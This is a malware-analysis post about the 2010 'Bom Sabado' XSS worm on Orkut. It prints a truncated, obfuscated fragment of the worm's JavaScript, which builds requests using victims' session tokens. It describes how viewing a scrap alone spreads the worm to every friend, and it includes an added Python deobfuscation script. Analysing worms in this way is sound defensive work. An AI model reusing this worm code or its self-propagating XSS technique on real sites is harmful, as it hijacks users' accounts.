Orkut, a popular social networking site, was hit by a new worm on Saturday, September 25, 2010. The worm uses an XSS exploit on the Orkut website that allows malware writers to inject malicious JavaScript files using iframe tags in the scrap text. The body of the scrap text reads “Bom Sabado!”
In Fig. 1 you can see the HTML code of the infected scrap.
Fig1 Infected Scrap
Given below is a portion of the JavaScript code file:
// Decoded, the first entries of the hex-escaped string table are: "Microsoft.XMLHttp", "POST_TOKEN=", "CGI.POST_TOKEN", "&signature=", "Page.signature.raw", "POST"
var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77","\x50\x4F\x53\x54",……………….
function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var…..
As you can see, the script is obfuscated: the strings it needs are stored as hex escapes in the _0x37a1 array and referenced by index. Its malicious purpose becomes clear once a deobfuscation script is run.
Here is the deobfuscated script code in Fig. 2.
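As an added illustration (not part of the original post), the following Python snippet performs the first deobfuscation step an analyst would apply to this sample: it extracts the hex-escaped string table, decodes it, and inlines the literals where the script references them by index. The embedded sample is constructed from the six strings shown on the page; the rest of the original array is elided.

```python
import re

# Constructed sample: the visible part of the worm's string table plus the
# first statements that reference it. Entries beyond index 5 are elided.
SAMPLE_JS = r'''var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77","\x50\x4F\x53\x54"];
function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);'''

# "var _0xNNNN=[ ... ];" declaration of the string table
ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];', re.S)
# one double-quoted JS string literal, escapes included
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# \xNN, \uNNNN or a single escaped character
ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|.)')

def decode_js_string(s):
    """Resolve JS string escapes the way the engine would before use."""
    def repl(m):
        esc = m.group(1)
        if esc[0] in 'xu':
            return chr(int(esc[1:], 16))
        return {'n': '\n', 't': '\t', 'r': '\r', '0': '\0'}.get(esc, esc)
    return ESCAPE_RE.sub(repl, s)

def extract_string_table(js):
    """Return (array_name, decoded_strings) or (None, []) if no table found."""
    m = ARRAY_RE.search(js)
    if not m:
        return None, []
    table = [decode_js_string(x) for x in STRING_RE.findall(m.group(2))]
    return m.group(1), table

def inline_string_table(js):
    """Replace every _0xNNNN[i] reference with its decoded literal."""
    name, table = extract_string_table(js)
    if name is None:
        return js
    ref = re.compile(re.escape(name) + r'\[(\d+)\]')
    def repl(m):
        idx = int(m.group(1))
        if idx >= len(table):          # index beyond a truncated table
            return m.group(0)          # leave the reference untouched
        lit = table[idx].replace('\\', '\\\\').replace('"', '\\"')
        return '"' + lit + '"'
    return ref.sub(repl, js)

if __name__ == '__main__':
    print(inline_string_table(SAMPLE_JS))
```

With the table inlined, the ActiveX fallback and the POST_TOKEN/signature request body are readable directly, which is what Fig. 2 on the page shows in full.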
Fig2 Deobfuscated JavaScript Code
It enumerates the friends list and sends the infected scrap to everyone (Fig. 3).
Fig3 Spreading to all friends
The most interesting part of the script is the function that sends the malicious scrap, illustrated in Fig. 4.
Fig4 XSS exploitation
As you can see, it exploits the XSS vulnerability on the Orkut site and embeds the iframe tag in the scrap text. Since the onLoad event is used to create the script tag, no user interaction is needed to execute the malicious script: merely viewing the scrap is enough.
It also sends join requests to some Orkut communities, possibly to track the infection status (Fig. 5).
Fig5 Join Communities